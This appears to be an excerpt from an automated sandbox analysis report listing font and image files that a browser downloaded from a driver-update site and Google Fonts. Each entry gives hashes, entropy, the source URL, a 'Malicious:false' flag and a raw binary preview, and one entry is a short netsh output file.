?.m=U.....&.E..1...o...,.P....^...O....UP(a.$W..t.!EC..h....t..~.Lc...W...m..:........#su..O.A...t.....-.W...aQ`..G.rZ6...Ph.h...^..3.....%...HW1.gzc..s^*..ky...}..J..d......a....Z.e.....n.l..y..$..e..J......u&..(.{h.1A..U.....b.L,#........M..=..A......t\..y.#..
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:TrueType Font data, 11 tables, 1st "OS/2", 14 names, Macintosh, type 1 string, icomoon-drp-soft
      Category:downloaded
      Size (bytes):1780
      Entropy (8bit):4.987944317028728
      Encrypted:false
      SSDEEP:
      MD5:79C49AB313D22CEACAA0739358F8C34B
      SHA1:18A933BD15949AA32537D493A23B13B1EE27AD56
      SHA-256:ED0B8D398FF904BA95E305CB083A8555847884C9486E612DF504D4C4E0C5F8FC
      SHA-512:8896D9A7C7DE9FD66AC6EECE50EBA3AE1AAED59A6978D84834EB7AD7858686C1F2A715A74DE887B5937F057819E1702C055E3DA8DD4CD87A2501D5D2239CC508
      Malicious:false
      Reputation:low
      URL:https://static.driverpack.io/font/icons/icomoon-drp-soft.ttf?io8dtm
      Preview:...........0OS/2...........`cmap.`".........gasp............glyfRS..........head.F&C...D...6hhea.......|...$hmtx.(..........loca.(.X........maxp........... name..Y.........post........... ...........................3...................................@.........@...@............... .............4.......d.......4.......d.......4.......d...0............. ......... ...........................4....................... ... ......................................79..................79..................79...........(...J.^.l.........>.54&'1..547>.7632...................3267167>.7654'..'&#".........5..32671."....32654&'1..#8.1."&54632..1..#...;.67>.7673<.54&#"......#...0.9................138.12671>.712654&#*.#1.......1...326757>.54&#"..1..4&#"..8.9..'..#"..1.....(/..\?>GG>>]....=**2........=22I.. .nJITTIJn. 70........-@@--@...(..............3--D..........qO....3--D..........pP............................d....e..............-uBG>>]....]>>G833T ...........&&d<<BTIJn. .nJITN.6......}@--@@-.'.......
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:RIFF (little-endian) data, Web/P image
      Category:downloaded
      Size (bytes):2544
      Entropy (8bit):7.890140184325884
      Encrypted:false
      SSDEEP:
      MD5:B60125112678F55AE7AACF5828F860D3
      SHA1:23C2F15C7E6AFE99DA250A3993F3B300455D7604
      SHA-256:E5C1DC6D7DBD8C73CC6E155C081D0FE809C175FD99FFD0366D6B810C76A2B52E
      SHA-512:808827919A6E6FB9F7FDBB90A99EAA2CE9639E4BDCE74B0CE0C360AEF82E1012324E15138B1643E80C4C6C97B529843092204674AA054BC4F514BDC8095A4056
      Malicious:false
      Reputation:low
      URL:https://static.driverpack.io/pic/vendors-landing/packard-bell.webp
      Preview:RIFF....WEBPVP8X...........m..ALPH.............]7666..`0Yh$..F#.,...d#.L...b.X,...`.XL4..`!..;.p.....|..>"b.......f...l>....6..4.;..../..i9....HB....s...@.Zc.....-..).#.~.d.7dL.....R...L....6....>.k......!...bv...4?.6n...#i.D....&.....[.@...x...j..x.JFX.d.?...tm7...s..c....""..(.^...>.".l....e....s.4....@....u....5w..X>7#.[... Y.E.....,..N.t;....P.}i......<.'..q20...Q...f....V.ei.4..~.a..LKW0l.WX..J.L....p\...M.....d........J..4XGo..5...M....;.A.o.9.;.Uz.......s..>.yf.....x.D.....<9M.v.e.~...u..e..$......?X.......h..(.a.8.......Ma...LrT....P...E[QS?Z......w..h...$.H.ug.E.d%....Y.W.....6O.Be..WS&T.w..P."^..i.f[7.Z$./..$.p7D...I.......4..e/.(......DD......(V......,E{..q......?.v.h.p.."b......+].O .-.1..N.e_D.7O..h1..ED.+....'..$..."....|..r.f.8..2...X7).\....Q...$.H...4...H.....p.z.8.8.I.b.......p.&.A^P.M.C....<..Y..&.......L...bQ......V@..Fw:..mz..]......&ox..........C.n.............Ye.......3..W...Q.......CV.<..&......2Q........A..]dN...(......)H.6..*K`
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:RIFF (little-endian) data, Web/P image
      Category:dropped
      Size (bytes):2150
      Entropy (8bit):7.871340129922397
      Encrypted:false
      SSDEEP:
      MD5:9949670AE06E47FA9EB5B211409B5413
      SHA1:0C938C06FB50E802CD8A0FA9BF28789EF068BA01
      SHA-256:A0055E14BD7B7F4DE181F5FDE795D5349DD546A2C5371D66DAE5FE0C62078E45
      SHA-512:3E0CF1BAED9295BD1A014493BFDE79045481FFF96F96DB836D9F819438736D930B6DBBD3FEFC6E97E1B48FED0266E0DA094BBAB538ED04FAC90FDFF4F16B0DA2
      Malicious:false
      Reputation:low
      Preview:RIFF^...WEBPVP8X..............ALPH=.........\.....C PUM...a*pu....@.].0.U........A ..r...l$.!..A..h.....d\DL...G.>?.u....6uy..I..N.6....)...6...x.. ..}.Zj...1.D4...:.!..]h./9..T......'..|a.U!H{Q,...d.22W\.A..LaA.-B.Lw=.V....Y7d.fm..k2..1....fp>.dr!R..AE....,.....(R.....9..Y.p..x5Y.....l...Z.n;c..d.6.5....h<VnM..\FNA...>.Y<c...S&....Y..Y...8.Y.r.....t.X..".g.wt.t.(....GY...U.~.}..yH..E#t....F.Q.6!nOp....4Su;.T....gi...V..z.|.Q..'=.PUA:......^.Q(.I._W`.l5 Z..t8x`.:TJ".?l.w..~..(.!..g._.`E.....GK......>.WH-.7...............^..@.|......gP<{H...w.."..7z..#..J..Ot[T....;>)..*f.A..#.n.M.O............4.VrNFj?..,.5OX..#.3R.L.h...V.L<.KIy.....[53.IEB.er...;p.d...b&.b7..b.~.Hli....k{v.u.$...(...g.~.G}.=aK..:v.+...~M.+~7.M.~.&.w.!]E..YMc.R-7...N........b..d.._~q2.h.|.....ht..kp....7R......:G......3H.:$..h..r..{ 7...t...v.O.8...vPx..jc...gB..hL.m.2#-........G..M$.3..H....3.s(..Mz..?..:.H..YN.....H..h.....c~M.@c.:q1.a.......=.0.W..5P......._I..8h'.5
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:Web Open Font Format (Version 2), TrueType, length 34852, version 1.0
      Category:downloaded
      Size (bytes):34852
      Entropy (8bit):7.99370036872867
      Encrypted:true
      SSDEEP:
      MD5:0E8EEFB4549A2EDF26C560CB9845952E
      SHA1:8D0B1718AACAD934FD0043C87CBC54AA091396BF
      SHA-256:7F653B3CE9D3277457FC6DA4EDB246AE2F6C913F088C42DCB8CD2E96267AA21A
      SHA-512:237659DD4B8680AB4856D38290D57AE9211B479C51033D8DB4AC61326551E33CC245EBF10EED35AAB6854D8196D6651EB70CB63A2BA1D7373404851FE084772E
      Malicious:false
      Reputation:low
      URL:https://fonts.gstatic.com/s/ubuntu/v20/4iCs6KVjbNBYlgoKfw72.woff2
      Preview:wOF2.......$......<................................r..2.`..V........#...........,...(.6.$..T. ..v..X..q[.+...n..!..m.ad..%.`.b...$...q..`..@.m~......IE.L:H...........A9.(u@F.(.E>..TZ.>..<L.],....&!...(x.R.Q:....yx..+r~.....r,..R.....\y..|:.\..*.9.$r...|..j].....-.0_..9=...B...}.U.`..2.L.........O..n.I];....P.7....GO..k..*.w.]$Q..M..t..!(..>p8...a...&....@............p.*......LIC.....X....*J............t.w.l....J..k...D.}o...............Y..D.....m....".6"r..Y.f`......V..E.U$...g}../.....I(.>u.....U.`n....`.............F.(0Q....BQ.9...#.Q...|...kZy.5ee..2....{Z.....+5w..1..bG".$......;..sE.=g(i...kB...Jj....VUWWu5T.t.4..fF.Z&.,....l.9a...Zr..V.V...4,........./.t?.B.2I ...t .J.......\.v.*vn.r.f@T.:Qtdp.........@l.x....)......A9Ra%..5`.s(..|.C..S'R.W...t(..u.....S.....DG~.h..`.7hG...z..pf.Kk..F....k.N%..S....2.8jN..V.H;.v.B.....2...j6$.6......Gt..> ;cgh.> ./_.....*.K..hC.@.:J..._]*.v....s3,m.....K.b...zZ..1w............([.=.5...l......
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:RIFF (little-endian) data, Web/P image
      Category:dropped
      Size (bytes):1866
      Entropy (8bit):7.850940777029823
      Encrypted:false
      SSDEEP:
      MD5:FC866121F644D4BFFC9E92AB78D0BB1D
      SHA1:883DA556AA410C6A957CCB16B9387DB78F2A696C
      SHA-256:AD239B064FFCA70AE60974EA49F7CFE26B4B0ADDF620AA77E76F89ADB511E78A
      SHA-512:B4FABD1D8F5DD0C730725AA67CDD0CE1BFC43FE1C38F9689237DBB2F2826434BBFF2D8705E36AE3B10392D2EC6DBA71863040F91792FDD6F04A55BEA9775B4A8
      Malicious:false
      Reputation:low
      Preview:RIFFB...WEBPVP8X...........m..ALPHA......l{..z....E....G../...p.p.I.a.QX,.W[YU.....C[.n.......?.M...3.6.8..A52_>.#.-m.q...w..e-.....A..}.....w.....L{......(h?..I.(.......,.........9:......G......F?rK.t.....$,t...q.P..\..N.LG ...OB.G..?.$.t...E..u....g..@..y.).O....'..xz..Q.Lc/...3.:q+s8.O.....k.4v%}..h.L..T..F4.J~."..gD.....D....o.:..4._...Z........#I.Y.....}'...]...@.VtF.y.>..5..1.,.5Z.yz.....QQ...{...h...o..H.`">:k..........u.W.......r.....F.D......2=.N4U..S8.^....&Z..G.F...|.F-.-.O....J.n..-......b'A|.{.#."ReL.....d.....T8.DL`..H.;......*..GL`..l...y:......1...!W.)5...x...pP..J....=#.G...O:.rEL........3.?.p...A2...Kc.$.hbc.^.@r.E7....?.D..Yyo.....-zd....x.=)j...,.q........O.iQ..N.J..,,f^5m...2..@m.........{.b)...H.[.J(.r....7...=...._2.......;..Hl.8...0..........I...z...)R........aY..[..H..r.s....0,.b'a)..B.O[....O....W..QY.;m.t............q..z-.<,..3..H.dm"..........w.i8..up".b%5...h....%q..."...F...l.8t+5.Lr0x..PA.<..V5.......}u...(`.2
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:Web Open Font Format (Version 2), TrueType, length 38752, version 1.0
      Category:downloaded
      Size (bytes):38752
      Entropy (8bit):7.994663609098447
      Encrypted:true
      SSDEEP:
      MD5:D451DECBAD0D0D2FEBA27610481A34D8
      SHA1:1479B2AD870D5E2BB04D206F33460089394F6EB5
      SHA-256:A5515C53111BB4A4F45AFF63D06DF893AE9033DC85E82CC2EF27FC099A4D7609
      SHA-512:687567D725AE5384BF73B0F1525692E3BB148550550A75AF48E23F1FBFCAE7B235E996AFCF4C9354BA10EE365927F450F7DC0E6EA7DE164873E1360412DCBF73
      Malicious:false
      Reputation:low
      URL:https://fonts.gstatic.com/s/ubuntu/v20/4iCv6KVjbNBYlgoC1CzjsGyN.woff2
      Preview:wOF2.......`......m...............................R..2.`..V........#.....8.....(...(.6.$..L. ..^..T...[5]qw...#..m.h....R";_......%w.......W.........I.z....Q..N7...H...]...CW.=.u....4..>...J..L.l{.'..!.f.}$V.0d.i....U.......U..................k..V.o[......(..h!..k.[....\...;.....n@.{..}6...w.3L..r.o.w.b.dk...tT....m8.z..g.....YR?..J...4+%.b.)&[.o._[..#eH<$..(...-..........F-fl....{o..y.y......UfUx.6.%l8..3.us;.....<btV.f.X....|...p...!..!..G.....L.h..| @. 5C.*.$...n....1.[Q.V.~.?.k;@sK.!.z..bU,.....9V*..C...}.........M!.Z'Q5F..>jT....*`E`..(..O...........>DR..)2i..?}..*....m.R.V ba\.1....... f...|.....J...A]U.$.d.d..PU.l......(.8....... ../.h.Yl9.(.{pr...*...L3..\.`.u....[...)?.k[@.mr..In........Q.A..@..Vj.....+..$...D.8.7.c.Z....-..... .<.v>..............'....B8.o. (L..N,>...h.A`.......p8..g..w....3.N$.xuW.4krM.....@.XO.....L..\@P._.>W.%........7...X.U...aj..$.~0.."l...X.W......D.....K=...l.f.Y.C..D.@)W.k7.[:W)..M..g..YKHph.|........
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:RIFF (little-endian) data, Web/P image
      Category:downloaded
      Size (bytes):2014
      Entropy (8bit):7.8639210518346205
      Encrypted:false
      SSDEEP:
      MD5:3FE8910EE4F27B2D9F4387C1EB96AF63
      SHA1:4377A5E1FE05E72892FE89185D1561BECAD4FB42
      SHA-256:5BF86D169A7DF82B7A91A89B60A6A8D0FACD5E414CD5E4745644D1C2D2572F6B
      SHA-512:38F8666F721A7FA432BAEA94D5F369EDF4C61F72335686C06A340FEA8733BAB9A8CC47B04AFD921DB30265911885D6111EB632895904F61338DC6461D59667E9
      Malicious:false
      Reputation:low
      URL:https://static.driverpack.io/pic/malwarebytes-icon.webp
      Preview:RIFF....WEBPVP8X..........."..ALPH.......l......K.e.Z.Z.HC[...P.R.....Y...d.).).J.2SX.iyS\f...hi...|.".;....{.....V..{..Ir I}.....d!....O..H;v..C..{.E.I....<.[.H;..Yd...7.4..-..v.d.......e.;h.P......2Tu4.....j.j<.uui.2.........n..}.k+.....#.q...Q*j<.......#/.....E.+......3OP.$.=.t.\2.t.=./.N...{.p.'.b7.....0I+Ik.dF..u.7....C..W...t...Z....(zke.;I.P$...p..L....v...,^.. ..N...'.F.kk$T[.q.....CV.s..@...L...R'e.7..v..A..dP...........gd..\)..q@..."...].J...d1.8}.z........0..I..41.I..N....^.2..4=...b.Lf.w.]..0.h...8..q._..'..M.......B...>...|v!..NF.$G.......P.%.H."...a....Z#0._../&....XO^.......!m&.[F..&_....&k...).Q.%)v$...\.Z>.....~/..LZ..UH2..vp... {}..w(..N2H..x.I>....P.W..A..pV..lJ......0..?.5..67."..*...a......#..$Y..l...I...b...xtSIF....8..o.}.....`*..g.m.y9T..H...m44^l.]O'...G.......F.tp..... .%.@.p!W.F.F....F..p..8.....H...2...{(N..E.O.4I}2....O..M}.&.4u...u]OQ.?.<.!*......U.....O*.WU...ZU......O..&u...@g8.2..X..E.V....!...D...X..".V....>..<..
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:RIFF (little-endian) data, Web/P image
      Category:downloaded
      Size (bytes):2546
      Entropy (8bit):7.880719557508703
      Encrypted:false
      SSDEEP:
      MD5:00A5A72C4FA461352180D506A0F8BE56
      SHA1:964C0108BC0F35D763DA98727FB25EBBE4A7E8D1
      SHA-256:276376DE2FA5DE05332DF78D9153DC2380E0A86ED6E33D3C587AFF245AB04013
      SHA-512:DB2B1DF8793E88F2551214839872AE5E0467813A4C8A279210731EFAD3479F93AEC9AA206A3A8763F9EFA1AAAB8B6FAC6DFE0BCDD9282E8B0C02019A5F39313B
      Malicious:false
      Reputation:low
      URL:https://static.driverpack.io/pic/vendors-landing/lenovo.webp
      Preview:RIFF....WEBPVP8X...........m..ALPH.......m..j{....C!.($..b..Lv*.h..ql6..b..$..d.QH..ig...g.=g.k...........N...#...'x.,..N8K~..M'.~.?.E...n.F.....*0...fl.{t"".5.?...Z......g......0^zx......L...~.._..T....&.:.....).....Y.d........I.....Y..A.....!..p`J..9`<.ub..CX..ne)y...3.u...bl..$R.tl..2tn...*..=.ja...Z.."dm....h....i+.......3j........TL>....s..|rX...c"|.G.o.ZbH.d ..-...C^)..Cg..y.|V..P...6B..`..Fn.;.aU./.i~R..mu.Wg.....zN....ypwf. ..o..f.p&l.k.....F.....EO.z,.r.....=....2.!.....;.. Z?.A%...=.r.p..M*.:v..]A?.2}. g......v.5...*....#../D.....~.t..D.......)..=.b.D..8.y...zBM..D....N'+....6..o[..|........fB...!n>.../7.D...8..`.3...Q.tA..@........^M`z%.Nx...>..B.L.&AO,.D.N.F..=.<.ZW./...g..!va&...+..?.\..;....v..<#no.B.T...X...I..X..]#..{.]..:Y[...y..q.+...5....-.u!'&c....&.w7;..Dj...z.h.7.!...)...S.paK...U%....C.bb..I.. d...r.....1!.........4....l\...j..v"j.mJ.mDD..X.{1m."..].....F.........Q..g.r......*....Na4Q:Y.+......a#%.....%..C[..B.t.....8.%....
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:RIFF (little-endian) data, Web/P image
      Category:downloaded
      Size (bytes):718
      Entropy (8bit):7.5860982432396185
      Encrypted:false
      SSDEEP:
      MD5:671BDD3A644089A866B54557101BF382
      SHA1:B988A18815C3A8F67BFB8274D07F1ECA609D4D97
      SHA-256:B8FB4483F92CC2C37CD5B15F85D9DF9FD9386726FC72CBBA7BBBE2A53846CBA2
      SHA-512:C8BB7FACB1BE36D32EEFDB6A7FEA1178A4904BFC506111E96A95741A8EA3B1057C325DF1094A2E1E28E86ED3DF70C2D9D43FF5D7CA3615C05043E8CA78DA5B2E
      Malicious:false
      Reputation:low
      URL:https://static.driverpack.io/pic/mcafee-icon.webp
      Preview:RIFF....WEBPVP8X........W.....ALPH......T.V$KW....!..).I..OBJ@BHx.."..k..3.".' "&....I*5i{<.jDd.-"Lo.P...h..F.T.WO.....d....$..o2..`.w..Y...y.[Z...d0.!.p....Y.5.f..6X.... &....`..Re~..:.......lMR..3..Y....$.......U`.)...p.7.7....d.......v8D....!).4.i...0".8/ "...QN.....x<...\...x'i.,...Z,-....14.*U...,...T<KOhI...o.........n....Sy...n...\y+U...S..H+..qH....y</.o#.h..HS.pnTj.y..\;.f-.s.*.RK.j.[*.=.K>..Z.VP8 .........*X...>.X.L(%#.-Y.i...l..4...C.7$.....~?@.s>.?..9.=.?s.{p..=.&.........\.\....@.......zWFP....*%....@.a$...p..ZL.S...&....e.`[..T ..S...`zr......?T.......C...I...Q.....(.tuhA...j{..............y.m.XAe.......s..?. .....}....v...F'2..B=g|x.[.._......#..PU..:Fh.....
      Process:C:\Windows\SysWOW64\netsh.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):7
      Entropy (8bit):2.2359263506290326
      Encrypted:false
      SSDEEP:
      MD5:F1CA165C0DA831C9A17D08C4DECBD114
      SHA1:D750F8260312A40968458169B496C40DACC751CA
      SHA-256:ACCF036232D2570796BF0ABF71FFE342DC35E2F07B12041FE739D44A06F36AF8
      SHA-512:052FF09612F382505B049EF15D9FB83E46430B5EE4EEFB0F865CD1A3A50FDFA6FFF573E0EF940F26E955270502D5774187CD88B90CD53792AC1F6DFA37E4B646
      Malicious:false
      Reputation:low
      Preview:Ok.....
      No static file info